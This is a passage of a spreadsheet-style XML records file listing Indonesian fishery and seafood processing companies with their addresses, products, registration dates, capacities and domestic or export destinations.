  <r>
    <n v="22353"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22354"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Segar (Cumi-cumi)"/>
    <d v="2020-11-25T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22355"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Beku"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22356"/>
    <x v="671"/>
    <s v="PT. INDO MANDIRI SEJAHTERA"/>
    <s v="Jl. Millenium 11 Blok F4 No.3, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Kepiting Segar"/>
    <d v="2020-12-02T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Selatan, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="22357"/>
    <x v="465"/>
    <s v="PT. TOXINDO PRIMA"/>
    <s v="Jl. Lingkar Timur No. 5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="800000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22358"/>
    <x v="465"/>
    <s v="PT. TOXINDO PRIMA"/>
    <s v="Jl. Lingkar Timur No. 5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Sebelah, Layur)"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="2000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22359"/>
    <x v="465"/>
    <s v="PT. TOXINDO PRIMA"/>
    <s v="Jl. Lingkar Timur No. 5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22360"/>
    <x v="465"/>
    <s v="PT. TOXINDO PRIMA"/>
    <s v="Jl. Lingkar Timur No. 5, Kel. Tegalkamulyan, Kec. Cilacap Selatan, Kabupaten Cilacap&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Rebus Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="5000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22361"/>
    <x v="672"/>
    <s v="KOPERASI MUTIARA BUNDA PESISIR"/>
    <s v="Jl. Sukajadi Gg Mesjid RT 004 RW 004, Kel. Raja Bejamu, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Kerang Hidup"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="212450"/>
    <s v="Kota Tanjung Balai, Kota Pekanbaru"/>
    <s v="Malaysia, Thailand"/>
  </r>
  <r>
    <n v="22362"/>
    <x v="672"/>
    <s v="KOPERASI MUTIARA BUNDA PESISIR"/>
    <s v="Jl. Sukajadi Gg Mesjid RT 004 RW 004, Kel. Raja Bejamu, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Sembilang, Senangin)"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Medan, Kota Pekanbaru"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22363"/>
    <x v="672"/>
    <s v="KOPERASI MUTIARA BUNDA PESISIR"/>
    <s v="Jl. Sukajadi Gg Mesjid RT 004 RW 004, Kel. Raja Bejamu, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Daging Kerang Rebus Beku"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Tanjung Balai"/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="22364"/>
    <x v="672"/>
    <s v="KOPERASI MUTIARA BUNDA PESISIR"/>
    <s v="Jl. Sukajadi Gg Mesjid RT 004 RW 004, Kel. Raja Bejamu, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="26000"/>
    <s v="Kota Medan"/>
    <m/>
  </r>
  <r>
    <n v="22365"/>
    <x v="672"/>
    <s v="KOPERASI MUTIARA BUNDA PESISIR"/>
    <s v="Jl. Sukajadi Gg Mesjid RT 004 RW 004, Kel. Raja Bejamu, Kec. Sinaboi, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Asin Kering"/>
    <d v="2020-09-21T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Medan, Kabupaten Bengkalis, Kota Pekanbaru, Kota Dumai"/>
    <m/>
  </r>
  <r>
    <n v="22372"/>
    <x v="673"/>
    <s v="PT, DUA PUTRA UTAMA MAKMUR TBK"/>
    <s v="Jl, Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel, Purworejo, Kec, Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Mentah Beku"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="86000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Rembang, Kabupaten Pati, Kota Semarang"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22373"/>
    <x v="673"/>
    <s v="PT. DUA PUTRA UTAMA MAKMUR TBK"/>
    <s v="Jl. Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="19000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Rembang, Kabupaten Pati, Kabupaten Semarang"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22374"/>
    <x v="673"/>
    <s v="PT. DUA PUTRA UTAMA MAKMUR TBK"/>
    <s v="Jl. Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Demersal Beku (Sebelah, Kerapu, Layur, Bawal, Kakap)"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="22375"/>
    <x v="674"/>
    <s v="PT, CITRADIMENSI ARTHALI"/>
    <s v="Jl, Raya Cirebon - Bandung Km 35 Blok Pos RT 02 RW 07, Kel, Sindangwasa, Kec, Palasah, Kabupaten Majalengka&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Otak-otak Ikan)"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="1700000"/>
    <s v="Kota Medan, Kabupaten Lampung Utara, Kota Jakarta Utara, Kabupaten Bandung, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="22377"/>
    <x v="673"/>
    <s v="PT. DUA PUTRA UTAMA MAKMUR TBK"/>
    <s v="Jl. Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Pelagis Beku (Kembung, Sarden, Layang, Cakalang, Tenggiri)"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Pati"/>
    <s v="China"/>
  </r>
  <r>
    <n v="22378"/>
    <x v="673"/>
    <s v="PT. DUA PUTRA UTAMA MAKMUR TBK"/>
    <s v="Jl. Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Rebus Beku"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="88000"/>
    <s v="Kabupaten Rembang, Kabupaten Pati, Kota Semarang"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22379"/>
    <x v="675"/>
    <s v="KOPERASI NELAYAN BERKAH BAHARI SEJAHTERA"/>
    <s v="Jl. Harapan Gang Cempaka RT 03, Kel. Tungkal Harapan, Kec. Tungkal Ilir, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Ikan Pelagis Segar (Sebelah, Bawal, Kakap)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tanjung Jabung Barat, Kota Jambi"/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22380"/>
    <x v="676"/>
    <s v="PT. TIMURAMA BOSI INVESTAMA"/>
    <s v="Jl. KH Abdul Jabbar Ashiry No.100, Kel. Pai, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-09-25T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Australia, Hong Kong, Japan, Korea, Democratic People's Republic of, Saudi Arabia, Singapore, United States"/>
  </r>
  <r>
    <n v="22381"/>
    <x v="677"/>
    <s v="CV. JAVA FISH"/>
    <s v="Pergudangan Ritz Gate Blok BA-11, Jl. Muncul, Kel. Bohar, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Bawal, Kerapu, Emperor, Sebelah, Kakatua, Kakap,  Barramundi)"/>
    <d v="2020-12-01T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="Australia, Hong Kong, Malaysia, Singapore"/>
  </r>
  <r>
    <n v="22382"/>
    <x v="595"/>
    <s v="PT. MALUKU PRIMA SUKSES"/>
    <s v="Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Marlin, Layaran, Layang, Cakalang)"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22384"/>
    <x v="678"/>
    <s v="PT. ARMADA SANJAYA KUPANG"/>
    <s v="Jl. Alor Fatubesi RT 001 RW 001, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="30"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar"/>
    <s v="Australia, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22385"/>
    <x v="678"/>
    <s v="PT. ARMADA SANJAYA KUPANG"/>
    <s v="Jl. Alor Fatubesi RT 001 RW 001, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Demersal Segar (Lencam, Anggoli, Kerapu, Kakap Merah, Layur)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="30"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar"/>
    <s v="Australia, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22386"/>
    <x v="678"/>
    <s v="PT. ARMADA SANJAYA KUPANG"/>
    <s v="Jl. Alor Fatubesi RT 001 RW 001, Kel. Fatubesi, Kec. Kota Lama, Kota Kupang&lt;br&gt;Nusa Tenggara Timur"/>
    <n v="19"/>
    <s v="Ikan Pelagis Segar (Tenggiri)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="30"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Kupang, Kota Makassar"/>
    <s v="Australia, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22387"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri 8 No. 8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="6000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22389"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri 8 No. 8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Hiu Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22390"/>
    <x v="679"/>
    <s v="PT. SEVEN SEAS MARINE PRODUCT"/>
    <s v="Jl. Rungkut Industri 8 No. 8, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Hiu Beku"/>
    <d v="2020-09-24T00:00:00"/>
    <n v="3000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22391"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Makerel Atlantik, Kod, Halibut, Makerel, Salem, Sarden)"/>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2"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Makerel Atlantik, Kod, Halibut, Makerel, Salem, Sarden)"/>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3"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku, Trout Beku"/>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4"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar, Trout Segar"/>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5"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>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6"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Pollock)"/>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7"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Segar (Pollock)"/>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8"/>
    <x v="680"/>
    <s v="PT. SARI LAUT NUSANTARA"/>
    <s v="Jl. Kav DPR No.181, Kel. Serua, Kec. Bojong Sari, Kota Depok&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Surimi Beku"/>
    <d v="2020-10-22T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Medan, Kota Pekanbaru, Kota Palembang, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kabupaten Banyumas, Kota Semarang, Kota Surabaya, Kota Pontianak, Kota Palangka Raya, Kota Banjarmasin, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="22399"/>
    <x v="681"/>
    <s v="PT. JAYABALI BERSAUDARA"/>
    <s v="Jl. Ikan Tuna Raya IV No.16 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="450000"/>
    <m/>
    <s v="Canada, China, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22400"/>
    <x v="681"/>
    <s v="PT. JAYABALI BERSAUDARA"/>
    <s v="Jl. Ikan Tuna Raya IV No.16 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Barramundi, Bawal, Anggoli, Kerapu, Layur, Kakap)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="170000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Canada, China, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22401"/>
    <x v="681"/>
    <s v="PT. JAYABALI BERSAUDARA"/>
    <s v="Jl. Ikan Tuna Raya IV No.16 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Lemadang, Gindara, Cakalang, Tenggiri)"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="180000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Canada, China, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22402"/>
    <x v="681"/>
    <s v="PT. JAYABALI BERSAUDARA"/>
    <s v="Jl. Ikan Tuna Raya IV No.16 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-09-30T00:00:00"/>
    <n v="160000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="Canada, China, Singapore, Taiwan, Province of China, Viet Nam"/>
  </r>
  <r>
    <n v="22403"/>
    <x v="682"/>
    <s v="CV. BERKAT MARINA JAYA"/>
    <s v="Kawasan Industri Candi-UKM Blok 20A No.08, Jl. Gatot Subroto, Kel. Ngaliyan, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Pari Segar"/>
    <d v="2021-05-21T00:00:00"/>
    <n v="96000"/>
    <m/>
    <s v="China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22404"/>
    <x v="683"/>
    <s v="PT. URCHINDIZE INDONESIA"/>
    <s v="Desa Bandengan RT 006 RW 002, Kec. Jepara, Kabupaten Jepara&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Ikan Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="Japan, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22405"/>
    <x v="683"/>
    <s v="PT. URCHINDIZE INDONESIA"/>
    <s v="Desa Bandengan RT 006 RW 002, Kec. Jepara, Kabupaten Jepara&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Rebon Kering"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22406"/>
    <x v="345"/>
    <s v="PT, BANDENG OERANG SEJAHTERA"/>
    <s v="Jl, Brigjen Katamso No,24 RT 004 RW 004, Kel, Kampung Dalem, Kec, Kota, Kota Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tenggiri, Mata Besar)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22407"/>
    <x v="345"/>
    <s v="PT, BANDENG OERANG SEJAHTERA"/>
    <s v="Jl, Brigjen Katamso No,24 RT 004 RW 004, Kel, Kampung Dalem, Kec, Kota, Kota Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Pisang-pisang, Layur, Bawal, Kapas-kapas, Kakap, Jaket, Barramundi)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22408"/>
    <x v="345"/>
    <s v="PT. BANDENG OERANG SEJAHTERA"/>
    <s v="Jl. Brigjen Katamso No.24 RT 004 RW 004, Kel. Kampung Dalem, Kec. Kota, Kota Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-12-11T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22411"/>
    <x v="664"/>
    <s v="PT. YU SHEN FISHERY INDONESIA"/>
    <s v="Jl. Pemelisan No.168 Suwung Batan Kendal, Kel. Sesetan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-10-06T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Hong Kong, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="22412"/>
    <x v="684"/>
    <s v="PT. GRAND MULTI CHEMICAL"/>
    <s v="Kawasan Industri dan Pergudangan Cikupamas Jl. Bhumimas VIIII No.7, Kel. Talaga, Kec. Cikupa, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tepung Rumput Laut"/>
    <d v="2020-10-20T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Timur"/>
    <m/>
  </r>
  <r>
    <n v="22413"/>
    <x v="35"/>
    <s v="CV. INDO PACIFIC"/>
    <s v="Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No. 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="250000"/>
    <s v="Kota Palembang, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kabupaten Rembang, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="22414"/>
    <x v="685"/>
    <s v="PT. PALMA MARINAIO NUSANTARA"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Bitung, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-10-09T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22415"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Bitung"/>
    <s v="China, Japan, Singapore"/>
  </r>
  <r>
    <n v="22416"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22417"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kuwe, Kerapu, Kakatua, Kakap)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="1000"/>
    <m/>
    <s v="Singapore"/>
  </r>
  <r>
    <n v="22418"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="22419"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China, Japan, Singapore"/>
  </r>
  <r>
    <n v="22420"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Lobster Hidup"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22421"/>
    <x v="686"/>
    <s v="CV. KEN JAYA PERKASA"/>
    <s v="Desa Kauditan, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sirip Hiu Kering"/>
    <d v="2020-11-24T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="22422"/>
    <x v="687"/>
    <s v="PT. KARYA KENCANA SUMBER SARI"/>
    <s v="Jl. Raya Sumorame No. 39, Kel. Sumorame, Kec. Candi, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerupuk Ikan, Kerupuk Udang"/>
    <d v="2020-10-13T00:00:00"/>
    <n v="850000"/>
    <m/>
    <s v="China, Malaysia, Netherlands, Singapore, Taiwan, Province of China, United States"/>
  </r>
  <r>
    <n v="22423"/>
    <x v="688"/>
    <s v="PT. TRIDAYA JAYA MANUNGGAL"/>
    <s v="Jl. Rembang Industri Raya No. 36 PIER, Kel. Rembang, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Mata Besar, Lencam, Kerapu, Layur)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="63350"/>
    <m/>
    <s v="Australia, Dominican Republic, United States"/>
  </r>
  <r>
    <n v="22424"/>
    <x v="688"/>
    <s v="PT. TRIDAYA JAYA MANUNGGAL"/>
    <s v="Jl. Rembang Industri Raya No. 36 PIER, Kel. Rembang, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="44350"/>
    <m/>
    <s v="Greece, Portugal, United States"/>
  </r>
  <r>
    <n v="22425"/>
    <x v="688"/>
    <s v="PT. TRIDAYA JAYA MANUNGGAL"/>
    <s v="Jl. Rembang Industri Raya No. 36 PIER, Kel. Rembang, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Gabus Laut, Lemadang, Cakalang, Tenggiri)"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="12670"/>
    <m/>
    <s v="France, Netherlands, R√©union, Thailand"/>
  </r>
  <r>
    <n v="22426"/>
    <x v="688"/>
